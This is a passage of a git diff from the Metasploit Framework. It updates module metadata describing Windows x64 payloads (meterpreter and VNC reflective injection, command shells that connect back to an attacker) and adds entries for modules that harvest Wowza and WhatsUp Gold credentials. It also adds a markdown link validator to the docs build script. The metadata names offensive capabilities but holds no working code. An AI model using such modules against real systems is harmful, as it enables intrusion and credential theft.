      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows x64 winhttp)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -206338,7 +207184,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTPS (Windows x64 winhttp)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -206591,7 +207437,7 @@
      "ege <egebalci@pm.me>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for an IPv6 connection (Windows x64)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection (Windows x64)",
    "references": [

    ],
@@ -206627,7 +207473,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -206662,7 +207508,7 @@
      "ege <egebalci@pm.me>",
      "UserExistsError"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a pipe connection (Windows x64)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a pipe connection (Windows x64)",
    "references": [

    ],
@@ -206697,7 +207543,7 @@
      "ege <egebalci@pm.me>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection (Windows x64)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (Windows x64)",
    "references": [

    ],
@@ -206737,7 +207583,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [

    ],
@@ -206773,7 +207619,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection with UUID Support (Windows x64)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -206808,7 +207654,7 @@
      "ege <egebalci@pm.me>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker via a named pipe pivot",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker via a named pipe pivot",
    "references": [

    ],
@@ -206843,7 +207689,7 @@
      "ege <egebalci@pm.me>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker (Windows x64)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker (Windows x64)",
    "references": [

    ],
@@ -206883,7 +207729,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [

    ],
@@ -206919,7 +207765,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [

    ],
@@ -207095,7 +207941,7 @@
    "author": [
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)",
+    "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
    "references": [

    ],
@@ -207130,7 +207976,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -207165,7 +208011,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Spawn a piped command shell (Windows x64) (staged). Listen for a pipe connection (Windows x64)",
+    "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
    "references": [

    ],
@@ -207199,7 +208045,7 @@
    "author": [
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Spawn a piped command shell (Windows x64) (staged). Listen for a connection (Windows x64)",
+    "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
    "references": [

    ],
@@ -207238,7 +208084,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker",
+    "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -207273,7 +208119,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Spawn a piped command shell (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)",
+    "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -207307,7 +208153,7 @@
    "author": [
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker (Windows x64)",
+    "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
    "references": [

    ],
@@ -207346,7 +208192,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker",
+    "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -207381,7 +208227,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [

    ],
@@ -207483,7 +208329,7 @@
    "author": [
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207519,7 +208365,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207555,7 +208401,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a pipe connection (Windows x64)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207590,7 +208436,7 @@
    "author": [
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection (Windows x64)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207630,7 +208476,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207666,7 +208512,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207702,7 +208548,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207740,7 +208586,7 @@
      "agix",
      "rwincey"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207775,7 +208621,7 @@
    "author": [
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker (Windows x64)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207815,7 +208661,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207851,7 +208697,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207887,7 +208733,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 winhttp)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTP (Windows x64 winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207923,7 +208769,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTPS (Windows x64 winhttp)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -212514,6 +213360,54 @@
    ],
    "needs_cleanup": null
  },
+  "post_multi/gather/wowza_streaming_engine_creds": {
+    "name": "Gather Wowza Streaming Engine Credentials",
+    "fullname": "post/multi/gather/wowza_streaming_engine_creds",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module collects Wowza Streaming Engine user credentials.",
+    "references": [
+      "URL-https://www.wowza.com/docs/use-http-providers-with-the-wowza-streaming-engine-java-api",
+      "URL-https://www.wowza.com/resources/WowzaStreamingEngine_UsersGuide-4.0.5.pdf"
+    ],
+    "platform": "Linux,OSX,Unix,Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-03-09 01:31:23 +0000",
+    "path": "/modules/post/multi/gather/wowza_streaming_engine_creds.rb",
+    "is_install_path": true,
+    "ref_name": "multi/gather/wowza_streaming_engine_creds",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "powershell",
+      "shell"
+    ],
+    "needs_cleanup": null
+  },
  "post_multi/general/close": {
    "name": "Multi Generic Operating System Session Close",
    "fullname": "post/multi/general/close",
@@ -216035,7 +216929,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-08 13:47:34 +0000",
+    "mod_time": "2023-03-05 20:15:14 +0000",
    "path": "/modules/post/windows/gather/credentials/enum_laps.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/enum_laps",
@@ -217879,7 +218773,7 @@
    "description": "This module finds saved login credentials\n          for the Windows Skype client. The hash is in MD5 format\n          that uses the username, a static string \"\\nskyper\\n\" and the\n          password. The resulting MD5 is stored in the Config.xml file\n          for the user after being XOR'd against a key generated by applying\n          2 SHA1 hashes of \"salt\" data which is stored in ProtectedStorage\n          using the Windows API CryptProtectData against the MD5",
    "references": [
      "URL-http://www.recon.cx/en/f/vskype-part2.pdf",
-      "URL-http://insecurety.net/?p=427",
+      "URL-https://web.archive.org/web/20140207115406/http://insecurety.net/?p=427",
      "URL-https://github.com/skypeopensource/tools"
    ],
    "platform": "Windows",
@@ -217888,7 +218782,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-08 13:47:34 +0000",
+    "mod_time": "2023-04-01 05:17:02 +0000",
    "path": "/modules/post/windows/gather/credentials/skype.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/skype",
@@ -218648,6 +219542,60 @@
    ],
    "needs_cleanup": null
  },
+  "post_windows/gather/credentials/whatsupgold_credential_dump": {
+    "name": "WhatsUp Gold Credentials Dump",
+    "fullname": "post/windows/gather/credentials/whatsupgold_credential_dump",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2022-11-22",
+    "type": "post",
+    "author": [
+      "sshah <sshah@assetnote.io>",
+      "npm <npm@cesium137.io>"
+    ],
+    "description": "This module exports and decrypts credentials from WhatsUp Gold to a CSV file;\n          it is intended as a post-exploitation module for Windows hosts with WhatsUp\n          Gold installed. The module has been tested on and can successfully decrypt\n          credentials from WhatsUp versions 11.0 to the latest (22.x). Extracted\n          credentials are automatically added to loot.",
+    "references": [
+      "CVE-2022-29845",
+      "CVE-2022-29846",
+      "CVE-2022-29847",
+      "CVE-2022-29848",
+      "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29845",
+      "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29846",
+      "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29847",
+      "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29848",
+      "URL-https://blog.assetnote.io/2022/06/09/whatsup-gold-exploit/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-02-23 16:34:43 +0000",
+    "path": "/modules/post/windows/gather/credentials/whatsupgold_credential_dump.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/whatsupgold_credential_dump",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "post_windows/gather/credentials/windows_autologin": {
    "name": "Windows Gather AutoLogin User Credential Extractor",
    "fullname": "post/windows/gather/credentials/windows_autologin",
@@ -219118,7 +220066,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-08 13:47:34 +0000",
+    "mod_time": "2023-03-05 20:15:14 +0000",
    "path": "/modules/post/windows/gather/enum_ad_groups.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_ad_groups",
@@ -219301,7 +220249,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-14 11:21:05 +0000",
+    "mod_time": "2023-03-05 20:15:14 +0000",
    "path": "/modules/post/windows/gather/enum_ad_users.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_ad_users",
@@ -3,13 +3,14 @@ require 'uri'
 require 'open3'
 require 'optparse'
 require 'did_you_mean'
+require 'kramdown'
 require_relative './navigation'

 # This build module was used to migrate the old Metasploit wiki https://github.com/rapid7/metasploit-framework/wiki into a format
 # supported by Jekyll. Jekyll was chosen as it was written in Ruby, which should reduce the barrier to entry for contributions.
 #
 # The build script took the flatlist of markdown files from the wiki, and converted them into the hierarchical folder structure
-# for nested documentation. This configuration is defiend in `navigation.rb`
+# for nested documentation. This configuration is defined in `navigation.rb`
 #
 # In the future a different site generator could be used, but it should be possible to use this build script again to migrate to a new format
 #
@@ -158,6 +159,10 @@ module Build
      @links = {}
    end

+    def syntax_errors_for(markdown)
+      MarkdownLinkSyntaxVerifier.errors_for(markdown)
+    end
+
    def extract(markdown)
      extracted_absolute_wiki_links = extract_absolute_wiki_links(markdown)
      @links = @links.merge(extracted_absolute_wiki_links)
@@ -176,7 +181,7 @@ module Build
        new_markdown.gsub!(link[:full_match], link[:replacement])
      end

-      fix_github_username_links(new_markdown)
+      new_markdown
    end

    attr_reader :links
@@ -295,74 +300,66 @@ module Build

      matched_pages.first.fetch(:new_path)
    end
+  end

-    def fix_github_username_links(content)
-      known_github_names = [
-        '@0a2940',
-        '@ChrisTuncer',
-        '@TomSellers',
-        '@asoto-r7',
-        '@busterb',
-        '@bwatters-r7',
-        '@jbarnett-r7',
-        '@jlee-r7',
-        '@jmartin-r7',
-        '@mcfakepants',
-        '@Op3n4M3',
-        '@gwillcox-r7',
-        '@red0xff',
-        '@mkienow-r7',
-        '@pbarry-r7',
-        '@schierlm',
-        '@timwr',
-        '@zerosteiner',
-        '@zeroSteiner',
-        '@harmj0y',
-      ]
-      # These tags look like Github/Twitter handles, but are actually ruby/java code snippets
-      ignored_tags = [
-        '@spid',
-        '@adf3',
-        '@LDAP-DC3',
-        '@harmj0yDescription',
-        '@phpsessid',
-        '@http_client',
-        '@abstract',
-        '@accepts_all_logins',
-        '@addresses',
-        '@aliases',
-        '@channel',
-        '@client',
-        '@dep',
-        '@handle',
-        '@instance',
-        '@param',
-        '@pid',
-        '@process',
-        '@return',
-        '@scanner',
-        '@yieldparam',
-        '@yieldreturn',
-        '@compressed',
-        '@content',
-        '@path',
-        '@sha1',
-        '@type',
-        '@git_repo_uri',
-        '@git_addr',
-        '@git_objs',
-        '@refs',
-      ]
+  # Verifies that markdown links are not relative. Instead the Github wiki flavored syntax should be used.
+  #
+  # Example bad: `[Human readable text](./some-documentation-link)`
+  # Example good: `[[Human readable text|./some-documentation-link]]`
+  class MarkdownLinkSyntaxVerifier
+    # Detects the usage of bad syntax and returns an array of detected errors
+    #
+    # @param [String] markdown The markdown
+    # @return [Array<String>] An array of human readable errors that should be resolved
+    def self.errors_for(markdown)
+      document = Kramdown::Document.new(markdown)
+      document.to_validated_wiki_page
+      warnings = document.warnings.select { |warning| warning.start_with?(Kramdown::Converter::ValidatedWikiPage::WARNING_PREFIX) }
+      warnings
+    end

-      # Replace any dangling github usernames, i.e. `@foo` - but not `[@foo](http://...)` or `email@example.com`
-      content.gsub(/(?<![\[|\w])@[\w-]+/) do |username|
-        if known_github_names.include? username
-          "[#{username}](https://www.github.com/#{username.gsub('@', '')})"
-        elsif ignored_tags.include? username
-          username
-        else
-          raise "Unexpected username: '#{username}'"
+    # Implementation detail: There doesn't seem to be a generic AST visitor pattern library for Ruby; We instead implement
+    # Kramdown's Markdown to HTML Converter API, override the link converter method, and warn on any invalid links that are identified.
+    # The {MarkdownLinkVerifier} will ignore the HTML result, and return any detected errors instead.
+    #
+    # https://kramdown.gettalong.org/rdoc/Kramdown/Converter/Html.html
+    class Kramdown::Converter::ValidatedWikiPage < Kramdown::Converter::Html
+      WARNING_PREFIX = '[WikiLinkValidation]'
+
+      def convert_a(el, indent)
+        link_href = el.attr['href']
+        if relative_link?(link_href)
+          link_text = el.children.map { |child| convert(child) }.join
+          warning "Invalid docs link syntax found on line #{el.options[:location]}: Invalid relative link #{link_href} found. Please use the syntax [[#{link_text}|#{link_href}]] instead"
        end
+
+        if absolute_docs_link?(link_href)
+          begin
+            example_path = ".#{URI.parse(link_href).path}"
+          rescue URI::InvalidURIError
+            example_path = "./path-to-markdown-file"
+          end
+
+          link_text = el.children.map { |child| convert(child) }.join
+          warning "Invalid docs link syntax found on line #{el.options[:location]}: Invalid absolute link #{link_href} found. Please use relative links instead, i.e. [[#{link_text}|#{example_path}]] instead"
+        end
+
+        super
+      end
+
+      private
+
+      def warning(text)
+        super "#{WARNING_PREFIX} #{text}"
+      end
+
+      def relative_link?(link_path)
+        !(link_path.start_with?('http:') || link_path.start_with?('https:') || link_path.start_with?('mailto:') || link_path.start_with?('#'))
+      end
+
+      # @return [TrueClass, FalseClass] True if the link is to a Metasploit docs page that isn't either the root home page or the API site, otherwise false
+      def absolute_docs_link?(link_path)
+        link_path.include?('docs.metasploit.com') && !link_path.include?('docs.metasploit.com/api') && !(link_path == 'https://docs.metasploit.com/')
      end
    end
  end
@@ -461,13 +458,25 @@ module Build

    def link_corrector_for(config)
      link_corrector = LinkCorrector.new(config)
+      errors = []
      config.each do |page|
        unless page[:path].nil?
          content = File.read(File.join(WIKI_PATH, page[:path]), encoding: Encoding::UTF_8)
+          syntax_errors = link_corrector.syntax_errors_for(content)
+          errors << { path: page[:path], messages: syntax_errors } if syntax_errors.any?
+
          link_corrector.extract(content)
        end
      end

+      if errors.any?
+        errors.each do |error|
